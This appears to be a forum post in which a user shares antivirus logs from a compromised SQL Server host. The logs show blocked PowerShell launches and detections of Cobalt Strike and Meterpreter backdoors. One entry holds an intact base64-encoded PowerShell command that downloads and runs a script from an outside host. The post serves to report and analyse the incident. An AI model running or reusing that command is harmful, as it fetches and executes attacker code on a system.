本帖最后由 LovelyTim 于 2022-6-7 11:17 编辑
顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录- 【2】2022-06-06 16:00:15,系统防护,应用加固,sqlservr.exe触犯应用加固规则, 已阻止
- 防护项目:数据库
- 操作目标:【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 操作目标参数:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe/c -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBzAHMAcQBsAC4AbABvAGEAZABlAHIAMAAxADEAOAAuAHgAeQB6ADoAMQA0ADMAMwAvAG0AcwBzAHEAbAA3AC4AdAB4AHQAJwApADsA
- 操作结果:已阻止
- 保护进程路径:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 保护进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【3】2022-06-06 15:59:28,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
- 病毒名称:Backdoor/CobaltStrike.l
- 病毒ID:976F2654168CFB4F
- 病毒路径:C:\Windows\Temp\TmpA0C0.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【4】2022-06-06 15:59:07,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
- 病毒名称:Backdoor/CobaltStrike.l
- 病毒ID:976F2654168CFB4F
- 病毒路径:C:\Windows\Temp\Tmp5157.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【5】2022-06-06 15:58:50,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
- 病毒名称:Backdoor/Meterpreter.ak
- 病毒ID:A00D08EFDA1AA78C
- 病毒路径:C:\Windows\Temp\TmpD48.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
- 【6】2022-06-06 15:58:46,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
- 病毒名称:Backdoor/Meterpreter.ak
- 病毒ID:A00D08EFDA1AA78C
- 病毒路径:C:\Windows\Temp\TmpFB07.tmp
- 操作类型:修改
- 操作结果:已处理
- 进程ID:1760
- 操作进程:D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
- 操作进程命令行:"D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
- 父进程:C:\Windows\System32\services.exe
- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
复制代码
|